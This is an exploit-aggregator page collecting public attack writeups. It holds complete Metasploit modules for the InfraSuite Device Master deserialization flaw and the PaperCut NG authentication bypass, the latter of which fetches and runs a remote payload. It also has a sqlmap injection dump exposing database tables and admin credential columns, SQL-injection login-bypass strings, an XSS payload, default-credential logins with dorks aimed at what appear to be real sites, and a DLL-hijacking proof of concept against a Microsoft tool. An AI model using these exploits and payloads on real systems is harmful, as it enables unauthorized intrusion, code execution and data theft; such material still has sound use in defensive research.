Latest exploits :: CodePwn

<pre><code># This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Udp prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Delta Electronics InfraSuite Device Master Deserialization', 'Description' => %q{ Delta Electronics InfraSuite Device Master versions below v1.0.5 have an unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()' method of the 'Device-Gateway-Status' process. The 'ParseUDPPacket()' method reads user-controlled packet data and eventually calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation, leading to unauthenticated code execution as the user running the 'Device-Gateway-Status' process. }, 'Author' => [ 'Anonymous', # Vulnerability discovery 'Shelby Pace' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2023-1133'], ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-23-672/'], ['URL', 'https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133'] ], 'Platform' => 'win', 'Privileged' => false, 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Targets' => [ [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper, 'CmdStagerFlavor' => :psh_invokewebrequest } ], [ 'Windows CMD', { 'Arch' => [ARCH_CMD], 'Type' => :windows_cmd } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => '2023-05-17', 'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS], 'Reliability' => [REPEATABLE_SESSION] } ) ) register_options([ Opt::RPORT(10100), OptInt.new('INFRASUITE_PORT', [ true, 'The port on which the InfraSuite Manager is listening', 80 ]), OptString.new('TARGETURI', [ true, 'The base path to the InfraSuite Manager', '/' ]) ]) end def check print_status('Requesting the login page to determine if target is InfraSuite Device Master...') res = send_request_cgi( 'method' => 'GET', 'rport' => datastore['INFRASUITE_PORT'], 'uri' => normalize_uri(target_uri.path, 'login.html') ) return CheckCode::Unknown unless res unless res.body.include?('InfraSuite Manager Login') return CheckCode::Safe('Target does not appear to be InfraSuite Device Master.') end print_status('Target is InfraSuite Device Master. Now attempting to determine version.') res = send_request_cgi( 'method' => 'GET', 'rport' => datastore['INFRASUITE_PORT'], 'uri' => normalize_uri(target_uri.path, 'js/webcfg.js') ) unless res&.body&.include?('var devicemasterCfg') return CheckCode::Detected('Discovered InfraSuite Device Master, but couldn\'t determine version.') end version = res.body.match(/version:'(\d+(?:\.\d+)+[a-zA-Z]?)'/) unless version && version.length > 1 return CheckCode::Detected('Failed to find version string') end version = version[1] vprint_status("Found version '#{version}' of InfraSuite Device Master") r_vers = Rex::Version.new(version) return CheckCode::Appears if r_vers < Rex::Version.new('1.0.5') CheckCode::Safe end def exploit connect_udp case target['Type'] when :windows_dropper execute_cmdstager when :windows_cmd execute_command(payload.encoded) end end def execute_command(cmd, _opts = {}) serialized = ::Msf::Util::DotNetDeserialization.generate( cmd, gadget_chain: :ClaimsPrincipal, formatter: :BinaryFormatter ) pkt = "\x01#{[ serialized.length ].pack('n')}#{serialized}" udp_sock.put(pkt) end def cleanup disconnect_udp end end </code></pre>

<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : https://www.codester.com/items/20872/ │ │ Vendor : Expert IT Solution │ │ Software : Expert Restaurant eCommerce 1.0 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /food_details.php https://www.website/food_details.php?food=[SQLI] GET parameter 'food' is vulnerable to SQL Injection --- Parameter: food (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- [+] Starting the Attack fetching current database current database: 'sagor_****_restu' fetching tables [34 tables] +--------------------------+ | add_to_cart_view | | admin_url | | contact_manage | | currencies | | customer_info | | delivery_live_status | | expense_manage | | food_category | | food_dish_manage | | food_dish_vari_man | | food_field_variant | | food_field_variant_value | | food_order_confirm | | food_review | | food_sub_category | | food_tag | | gallery_manage | | hall_manage | | income_manage | | kitchen_live_sta | | menu_manage | | opening_manage | | order_accounts | | order_other_address | | page_manage | | payment_gateway | | shipping_charge | | site_setting | | slider_manage | | social_manage | | sup_ad_log | | table_book | | table_manage | | team_manage | +--------------------------+ fetching columns for table 'sup_ad_log' [5 columns] +----------------+--------------+ | Column | Type | +----------------+--------------+ | status | varchar(100) | | id | int(11) | | sup_admin_name | varchar(100) | | sup_pass | varchar(100) | | sup_user | varchar(100) | +----------------+--------------+ [-] Done </code></pre>

<pre><code>==================================================================================================================================== | # Title : mvc-shop v0.5 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | | # Vendor : https://github.com/tanhongit/new-mvc-shop/releases/tag/v0.5 | | # Dork : | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] Register a new membership and enter the membership control panel and choose to modify the member's profile and in the name field put any payload that suits you and then save the changes [+] Use Payload : <script>alert(/indoushka/);</script> [+] http://127.0.0.1/chikoiquan.tanhongitcom/ == Greetings to :=========================================================================== jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | ============================================================================================ </code></pre>

<pre><code>==================================================================================================================================== | # Title : NETXPERTS-CMS v0.1 Auth By Pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : http://netxperts.in/ | | # Dork : "Designed by NETXPERTS" | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use payload : user : 1'or'1'='1 & Pass : 1'or'1'='1 [+] https://127.0.0.1/sivasudartravels/admin/production.php Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ======================================================================================================================================= </code></pre>

<pre><code>Hi @ll, about a month ago Microsoft published HVCIScan-{amd,arm}64.exe, a "Tool to check devices for compatibility with memory integrity (HVCI)" The "Install instructions" on the download page <https://www.microsoft.com/en-us/download/105217> tell: | Download the hvciscan.exe for your system architecture (AMD64 or ARM64). | From an elevated command window or PowerShell, run hvciscan.exe "ELEVATED" sounds good, especially when such a vulnerable tool is run from the "Downloads" folder, where a file HVCIScan_amd64.exe.manifest, HVCIScan_arm64.exe.manifest or VBSAPI.dll can be placed via "drive-by" download or by the (unsuspecting) unelevated user who still abuses the "protected administrator" account created during Windows setup. Oops, one step back: how did I determine a) that HVCIScan-*.exe is vulnerable b) these filenames? Open an UNELEVATED command window and run LINK.exe /DUMP /DEPENDENTS /LOADCONFIG /SUMMARY HVCIScan_amd64.exe and/or LINK.exe /DUMP /DEPENDENTS /LOADCONFIG /SUMMARY HVCIScan_arm64.exe then inspect the output. | Dump of file HVCIScan_amd64.exe | | File Type: EXECUTABLE IMAGE | | Image has the following dependencies: | | KERNEL32.dll | msvcrt.dll | VbsApi.dll ~~~~~~~~~~ | Section contains the following load config: | ... | 0000 Dependend load flags ... | Summary | | 1000 .data | 1000 .pdata | 2000 .rdata | 1000 .reloc | 1000 .text OUCH: the guys at M$FT built these tools without embedded "application manifest" (which would have been placed in a ".rsrc" section), so Windows will apply an external "application manifest", and without /DEPENDENTLOADFLAG:2048, so Windows will search dependent DLLs not listed as "Known DLL" in the "application directory" first. Both omissions^WBEGINNER'S MISTAKES allow to load and execute ARBITRARY DLLs from ARBITRARY paths that run with the (ELEVATED) credentials of the application! "Trustworthy Computing" anyone? Or "Security Development Lifecycle"? <https://www.microsoft.com/en-us/securityengineering/sdl> Proof of concept #1: ~~~~~~~~~~~~~~~~~~~~ a) Open an UNELEVATED command window in the directory where you saved HVCISCAN_amd64.exe respectively HVCISCAN_arm64.exe b) Create an empty file VbsApi.dll next to the executable: COPY NUL: VbsApi.dll c) Run HVCISCAN_amd64.exe or HVCISCAN_arm64.exe and admire the error message that VbsApi.dll can't be loaded. Building a VbsApi.dll with the exports required by HVCIScan-a??64.exe to actually load and execute VbsApi.dll is left as an exercise to the reader. See <https://skanthak.homepage.t-online.de/minesweeper.html> if you need help. Proof of concept #2: ~~~~~~~~~~~~~~~~~~~~ a) Create the text file HVCISCAN_amd64.exe.manifest respectively HVCISCAN_arm64.exe.manifest with the following content next to HVCISCAN_amd64.exe respectively HVCISCAN_arm64.exe: --- HVCISCAN_a??64.exe.manifest --- <?xml version="1.0" encoding="UTF-8" standalone="yes" ?> <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1"> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="KERNEL32.dll" /> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="msvcrt.dll" /> <file loadFrom="\\SERVER\SHARE\arbitrary.dll" name="VbsApi.dll" /> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2"> <security> <requestedPrivileges> <requestedExecutionLevel level="requireAdministrator" uiAccess="false" /> </requestedPrivileges> </security> </trustInfo> </assembly> --- EOF --- Replace the UNC path \\SERVER\SHARE\arbitrary.dll with any local or remote path where you can create the specified file. NOTE: the section "trustInfo" is optional. NOTE: KERNEL32.dll and MSVCRT.dll are "Known DLLs". b) Create an empty file arbitrary.dll in the specified network share or local directory: COPY NUL: \\SERVER\SHARE\arbitrary.dll c) Run HVCISCAN_amd64.exe or HVCISCAN_arm64.exe and admire the error message that a required DLL or an entry point is not found. Building \\SERVER\SHARE\arbitrary.dll with the exports required by HVCIScan-a??64.exe to actually load and execute arbitrary.dll is left as an exercise to the reader. stay tuned, and far away from "tools" made in Redmond Stefan Kanthak </code></pre>

<pre><code>==================================================================================================================================== | # Title : Anuranan SBAdmin 2 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 113.0.1 (64 bits) | | # Vendor : https://anuranangroup.com/ | | # Dork : Created by: Anuranan Group | ==================================================================================================================================== poc : [+] The vulnerability is about leaving the default settings During the installation of the script and using the default username and password [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : user&pass= admin [+] https://127.0.0.1/hpgreenlandresort.com/admin/login.aspx Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'cgi' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'PaperCut PaperCutNG Authentication Bypass', 'Description' => %q{ This module leverages an authentication bypass in PaperCut NG. If necessary it updates Papercut configuration options, specifically the 'print-and-device.script.enabled' and 'print.script.sandboxed' options to allow for arbitrary code execution running in the builtin RhinoJS engine. This module logs at most 2 events in the application log of papercut. Each event is tied to modifcation of server settings. }, 'License' => MSF_LICENSE, 'Author' => ['catatonicprime'], 'References' => [ ['CVE', '2023-27350'], ['ZDI', '23-233'], ['URL', 'https://www.papercut.com/kb/Main/PO-1216-and-PO-1219'], ['URL', 'https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise/'], ['URL', 'https://www.bleepingcomputer.com/news/security/hackers-actively-exploit-critical-rce-bug-in-papercut-servers/'], ['URL', 'https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software'] ], 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'Automatic Target', {}] ], 'Platform' => [ 'java' ], 'Arch' => ARCH_JAVA, 'Privileged' => true, 'DisclosureDate' => '2023-03-13', 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => '9191', 'SSL' => 'false' }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES] } ) ) register_options( [ OptString.new('TARGETURI', [true, 'Path to the papercut application', '/app']), OptInt.new('HTTPDELAY', [false, 'Number of seconds the web server will wait before termination', 10]) ], self.class ) @csrf_token = nil @config_cleanup = [] end def bypass_auth # Attempt to generate a session & recover the anti-csrf token for future requests. res = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'vars_get' => { 'service' => 'page/SetupCompleted' } } ) return nil unless res && res.code == 200 vprint_good("Bypass successful and created session: #{cookie_jar.cookies[0]}") # Parse the application version from the response for future decisions. product_details = res.get_html_document.xpath('//div[contains(@class, "product-details")]//span').children[1] if product_details.nil? product_details = res.get_html_document.xpath('//span[contains(@class, "version")]') end version_match = product_details.text.match('(?<major>[0-9]+)\.(?<minor>[0-9]+)') @version_major = Integer(version_match[:major]) match = res.get_html_document.xpath('//script[contains(text(),"csrfToken")]').text.match(/var csrfToken ?= ?'(?<csrf>[^']*)'/) @csrf_token = match ? match[:csrf] : '' end def get_config_option(name) # 1) do a quickfind (setting the tapestry state) res = send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'headers' => { 'Origin' => full_uri }, 'vars_post' => { 'service' => 'direct/1/ConfigEditor/quickFindForm', 'sp' => 'S0', 'Form0' => '$TextField,doQuickFind,clear', '$TextField' => name, 'doQuickFind' => 'Go' } } ) # 2) parse and return the result return nil unless res && res.code == 200 && (html = res.get_html_document) return nil unless (td = html.xpath("//td[@class='propertyNameColumnValue']")) return nil unless td.count == 1 && td.text == name value_input = html.xpath("//input[@name='$TextField$0']") value_input[0]['value'] end def set_config_option(name, value, rollback) # set name:value pair(s) current_value = get_config_option(name) if current_value == value vprint_good("Server option '#{name}' already set to '#{value}')") return end vprint_status("Setting server option '#{name}' to '#{value}') was '#{current_value}'") res = send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'headers' => { 'Origin' => full_uri }, 'vars_post' => { 'service' => 'direct/1/ConfigEditor/$Form', 'sp' => 'S1', 'Form1' => '$TextField$0,$Submit,$Submit$0', '$TextField$0' => value, '$Submit' => 'Update' } } ) fail_with Failure::NotVulnerable, "Could not update server config option '#{name}' to value of '#{value}'" unless res && res.code == 200 # skip storing the cleanup change if this is rolling back a previous change @config_cleanup.push([name, current_value]) unless rollback end def cleanup super if @config_cleanup.nil? return end until @config_cleanup.empty? cfg = @config_cleanup.pop vprint_status("Rolling back '#{cfg[0]}' to '#{cfg[1]}'") set_config_option(cfg[0], cfg[1], true) end end def primer payload_uri = get_uri script = <<~SCRIPT var urls = [new java.net.URL("#{payload_uri}.jar")]; var cl = new java.net.URLClassLoader(urls).loadClass('metasploit.Payload').newInstance().main([]); s; SCRIPT # The number of parameters passed changed in version 17. form0 = 'printerId,enablePrintScript,scriptBody,$Submit,$Submit$0' if @version_major > 16 form0 += ',$Submit$1' end # 6) Trigger the code execution the printer_id res = send_request_cgi( { 'method' => 'POST', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'headers' => { 'Origin' => full_uri }, 'vars_post' => { 'service' => 'direct/1/PrinterDetails/$PrinterDetailsScript.$Form', 'sp' => 'S0', 'Form0' => form0, 'enablePrintScript' => 'on', '$Submit$1' => 'Apply', 'printerId' => 'l1001', 'scriptBody' => script } } ) fail_with Failure::NotVulnerable, 'Failed to prime payload.' unless res && res.code == 200 end def check # For the check command bypass_success = bypass_auth if bypass_success.nil? return Exploit::CheckCode::Safe end return Exploit::CheckCode::Vulnerable end def exploit # Main function # 1) Bypass the auth using the SetupCompleted page & store the csrf_token for future requests. bypass_auth unless @csrf_token if @csrf_token.nil? fail_with Failure::NotVulnerable, 'Target is not vulnerable' end # Sandboxing wasn't introduced until version 19 if @version_major >= 19 # 2) Enable scripts, if needed set_config_option('print-and-device.script.enabled', 'Y', false) # 3) Disable sandboxing, if needed set_config_option('print.script.sandboxed', 'N', false) end # 5) Select the printer, this loads it into the tapestry session to be modified res = send_request_cgi( { 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'keep_cookies' => true, 'headers' => { 'Origin' => full_uri }, 'vars_get' => { 'service' => 'direct/1/PrinterList/selectPrinter', 'sp' => 'l1001' } } ) fail_with Failure::NotVulnerable, 'Unable to select [Template Printer]' unless res && res.code == 200 Timeout.timeout(datastore['HTTPDELAY']) { super } rescue Timeout::Error # When the server stop due to our timeout, this is raised end def on_request_uri(cli, request) vprint_status("Sending payload for requested uri: #{request.uri}") send_response(cli, payload.raw) end end </code></pre>

<pre><code>==================================================================================================================================== | # Title : Magento eCommerce v 2.4.0 sensitive information disclosure Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) | | # Vendor : https://devdocs.magento.com/ | | # Dork : Index of /var/log/ | ==================================================================================================================================== poc : [+] Keeping records in an unprotected folder, The logs contain sensitive information such as folder path,etc... [+] Dorking İn Google Or Other Search Enggine . [+] http://127.0.0.1/dawnfrozenfoods.com/var/log/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | | ======================================================================================================================================= </code></pre>

<pre><code>==================================================================================================================================== | # Title : wizcyb interactive v2.0 auth by pass Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit) | | # Vendor : https://www.wizcyb.com/products.php | | # Dork : powered by wizcyb interactive | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Use Payload : user=1' or 1=1 -- - & pass=1' or 1=1 -- - [+] https://127.0.0.1/www/jobcapsindiacom/admin/ Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | | ======================================================================================================================================= </code></pre>